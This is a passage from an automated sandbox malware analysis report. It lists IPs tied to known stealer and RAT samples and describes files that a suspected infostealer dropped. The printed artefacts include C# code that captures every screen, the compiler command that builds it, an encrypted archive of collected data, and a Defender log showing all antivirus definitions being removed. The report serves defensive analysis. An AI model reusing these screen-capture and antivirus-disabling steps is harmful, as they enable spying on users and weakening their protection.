                                                                                                                                                                                                                  Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 162.159.128.233
                                                                                                                                                                                                                  dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                  • 162.159.138.232
                                                                                                                                                                                                                  DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                  • 162.159.138.232
                                                                                                                                                                                                                  http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 162.159.138.232
                                                                                                                                                                                                                  YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 162.159.136.232
                                                                                                                                                                                                                  YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 162.159.136.232
                                                                                                                                                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 162.159.137.232
                                                                                                                                                                                                                  ip-api.comddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                  • 208.95.112.1

                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  CLOUDFLARENETUS9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  http://livedashboardkit.infoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.166.199
                                                                                                                                                                                                                  4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 1.13.111.69
                                                                                                                                                                                                                  31.13.224.14-mips-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 1.4.15.193
                                                                                                                                                                                                                  random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  download.bin.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.112.1
                                                                                                                                                                                                                  https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.18.94.41
                                                                                                                                                                                                                  https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                  • 104.18.90.62
                                                                                                                                                                                                                  TUT-ASUSddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                  intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                  • 208.95.112.1

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dllHoloscope-V1.3.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                      winws1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        discord.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                              NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                                HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                  meN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                    client1.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:@...e...........................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.0.cs

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1004
                                                                                                                                                                                                                                      Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                      MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                      SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                      SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                      SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):609
                                                                                                                                                                                                                                      Entropy (8bit):5.345416211192406
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikq1S+UWZE21Sa9:V3ka6KOkqeFkq1SGE21S8
                                                                                                                                                                                                                                      MD5:C75BB8F4B53BF36AA759CFB2433703F3
                                                                                                                                                                                                                                      SHA1:C2D26F617B4CBA3AE3C58EDBD148915A7106F38E
                                                                                                                                                                                                                                      SHA-256:490B2C91D6BEBB7A5F6BD5F027A07BDCA33179B2A76B4CC9B0FD0F4B1BF36013
                                                                                                                                                                                                                                      SHA-512:08646EF7B2C662F189026C4D833A4EEA462596F0487989C040352DDE9B3EAF079487366A6F31DCA42E9E8AE0E72050C68A4ACFAF41120D49963BD20B3438997A
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.0.cs"

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4096
                                                                                                                                                                                                                                      Entropy (8bit):3.1584977481949865
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:6E7oEAtf0KhzBU/jf6mtJEN0qhPpW1ulXa3rq:wNz02mcOwFK
                                                                                                                                                                                                                                      MD5:396178D7BD49084F0957BB02C510907C
                                                                                                                                                                                                                                      SHA1:5230F16E4470C961AD3D5D962FDDDD6F2DB0F6CC
                                                                                                                                                                                                                                      SHA-256:CFC542E14AB4D5AD9F3D2AC74D5AF6B0FA42E5AC52317A315E7F59DB527C0002
                                                                                                                                                                                                                                      SHA-512:A6CF56A305AF06C2A44A4961C14A51C0C5BB421949DC0F97FCA8AE4FAF51B374435B6C0DF190F8B0D506E98F102B6498F1A55CA33C0EBCD5CD0581907EEA9DE4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.out

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):1151
                                                                                                                                                                                                                                      Entropy (8bit):5.49067354150436
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:KLWId3ka6KOkqeFkq1SGE21SpKax5DqBVKVrdFAMBJTH:2Wkka6NkqeFkqLE22K2DcVKdBJj
                                                                                                                                                                                                                                      MD5:98A765EE721411A8D992CE5F7B85FB2D
                                                                                                                                                                                                                                      SHA1:72220851714C1AFDF0840898C32B3E67A100A661
                                                                                                                                                                                                                                      SHA-256:5BB2A594657B9B72ECFD1B9D8EC2480C3C26E63DE1FE3FCF498D50D55343212F
                                                                                                                                                                                                                                      SHA-512:EF3406254E63F87572FB71959337F58383AA302C61DCC2C3CBB3D20C418935B7D2D7295D63E4C751ACC0AFEED58061D85ACBD0ADFB725D01FC5DF4E20F2C9E8C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                                                      Entropy (8bit):3.100020444340795
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhjak7YnqqQsPN5Dlq5J:+RI+ycuZhNXakSJPNnqX
                                                                                                                                                                                                                                      MD5:7E5B80053A0E290710F8DB920AB0071D
                                                                                                                                                                                                                                      SHA1:D30399DA5EFD8FB724E431573D285DE109B4CF0B
                                                                                                                                                                                                                                      SHA-256:5FC6195F2D0C56BC7F99223A1B2FEBEB0C5A84563EC716CC5506EF063B62FEFF
                                                                                                                                                                                                                                      SHA-512:471D33C65B6F34BAF1CDA0579833F7194383AF4FBE34120F51D509D3F9E0336E89EADBE24949874F1B8B9DE931BD74B00097FABCEBD426919A5E50428B732E30
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.l.f.c.h.n.c.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.l.f.c.h.n.c.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\??? ? ?\Display (1).png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):707837
                                                                                                                                                                                                                                      Entropy (8bit):7.92829731962899
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:vx21cTsa/8X1wsAKc+GLZ9nTEmOAAtyjhji5/Hu8MHDJFj750po1Z2CvZE54:J21cQa/8XisSvTEmO/t4ZfHDJF6Kjniq
                                                                                                                                                                                                                                      MD5:AD9B44EF91FD3A3A9E9000B3E0C074EE
                                                                                                                                                                                                                                      SHA1:1959D98E7EFBCBB453AD8778F63FAC5382086C59
                                                                                                                                                                                                                                      SHA-256:64C69EC5C1C59023B0F1CE0D231F722CBE6D99751F54AD2D3A7475C836347265
                                                                                                                                                                                                                                      SHA-512:AB3B5694A1E15E92B102D15EB6C037F84EE07058B91BA4538C2750DBF12BFEE535BAD5EAB5AB01640062655F946463096E7F2929BA00F4C9A786EE06EC950C22
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]...]U.t..........t8..nw.9.......(.DF..F..8...d.@.(..q76.`2.E@.$r. DF`......g};U.R..1~c...o..V..~.k.jg..z..Mx..qn~lE.....F[..F......6.3:.vz.{..^mD.uH_F=.W/..=-}..R?eu...J..b.@.vK...Q;q..;..~..k..^Z.....}..[R?&...9.~.m.;..~..oc..v....w........R?...w...A............1..>Y...B....B..O...{"....q.a....+...X.|..aQ?`E.......Q..C-......_..#..}_.y#....+........m..hI..|...?..../.......H.9.+.....U_ca......3.......!.yK}.]....0.s....w......}.].Zb.......d..y.1{...3.>....0...x..kM_..U0.w.G.}6.U.X.P.....}{.Q.&~..0~V.c.e.....b|..;7n..)6~...=c..1..3.uw_..f,......S...=...|.q{..&....G,..'/.k;/Ls...>.].......hs....K...%..w.s;/J.wZX.&.#L.=...6.v..q..q...........x?;...iA..xk.c..[.Vlk;....(1.K.n..%....Y...?n..R..b.;....{.pk.10...1.}....7..D..[..g.../H.y....}...zK......?=.o.X}.M......}M...ki'L.k..sS...j<.m....?%^7..)O.g...8=~.1f.......1...!...q-.t=.1...x.1F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\BPWmX.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
                                                                                                                                                                                                                                      File Type:RAR archive data, v5
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):757278
                                                                                                                                                                                                                                      Entropy (8bit):7.999752880302527
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:12288:G+OaQtyoha5eeI8m37auSodL3f+7bpi+Toi2/NvHc/Gs96XXlGj/xY:GZpg5eGmL5DmxToi2/NvHaTkXXl4/C
                                                                                                                                                                                                                                      MD5:D5213D2D94937546AB9C9FC3B4553979
                                                                                                                                                                                                                                      SHA1:8F6DA4D884D614DC7583E0C673620D58C1777055
                                                                                                                                                                                                                                      SHA-256:18B1B4297D161A50E457CF82E3E3AB5E236B510AA8B97BCA5EEA8605F72FD592
                                                                                                                                                                                                                                      SHA-512:731503791F8E60CDF9124F8A7C19621C2CFA1A301CCF9FE8139629050796D175478A2D448A8F549580F248416ACF7A904D912E6B7E57AB821995CFA64A8EBA18
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:Rar!.... ..`!.....K.}~D...9.......se..r....>.Ch.~s:..xGlD.r..;....";[...{b.;|.#b%p/.aQ....hd........w..g....H...B....t...)A:Rp.sj..#.g...y....4...%.t\@k8.ZX~.j......_........E"w..\.a`,U..@teq....7.`......+."d[.FX Dv.E.).O.*..v...%..+..........~n........-.`..+t{gaXW..ZW.$A5J..s...."..l..P.~7..@..6u ...z.q_.N.....t.....D....0..9.N...t5=n.W.>..{..[J....:..HiD.I9|....vg}......"/..D.|.3..d..4.U.k...V._.i=d.."....P.....i..r...+.G'#(.$9T.E....92b.;#..,.Y).._..d.....]:....)-k.V.............|>.....\z......'P.@G..\...o.gE.s.N_..{..;.Rs...*{ ..=.D...A.C?. ='!..L.z:.."!<.)...|....R.....=.gnQ.J\..F......-G..=..?.:N`3K.F.....#U.LC....r.`.0n..|.f../..(|....3...S..XF.c...s..g.x.,./ ..y.z.....uF.km.^.l....O`]....>.E.. 6...-.s.!.../tJ.........Bl.....<.M....;.~......'.j.OSak!&.....N.`.y1..t.....k......0a..........8...t...t...bT.0(\zOP)*...~...L7.!...^+..1.aCs.ND.>E/...|3."..#...>..A.......s."....n..7..T9.MfA.4...O+.....].1D......ig..q..W.(.Z(./4..]W.6...7Pq

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):894
                                                                                                                                                                                                                                      Entropy (8bit):3.1182182825683284
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrZ6jCk9+MlWlLehW51IC46jP:QOaqdmOFdjrgB+kWResLIYL
                                                                                                                                                                                                                                      MD5:EA2A6252CE2DB0662B68EB774BA0F8EC
                                                                                                                                                                                                                                      SHA1:741E992DC9128E8174D18C3FDF5AF4ED91E22D23
                                                                                                                                                                                                                                      SHA-256:3B8F1F4E1D685E8825B2D5C264BBDE1E36EC21611F497DE523F686ACEA6B4242
                                                                                                                                                                                                                                      SHA-512:413CF79F74F79D81A4A31AEEE9B5C760BF809D8332CB60603B9BBD7EE2FB272001D5F5EA30678D38DF2D564CB26B60AC32D46E1DCA492FBAA78C1672921CA890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. J.a.n. .. 0.4. .. 2.0.2.5. .0.3.:.4.2.:.1.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. J.a.n. .. 0.4. .. 2.0.2.5. .0.3.:.4.2.:.1.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RESF89E.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Sat Jan 4 09:43:01 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                      Entropy (8bit):4.121452491863558
                                                                                                                                                                                                                                      Encrypted:false
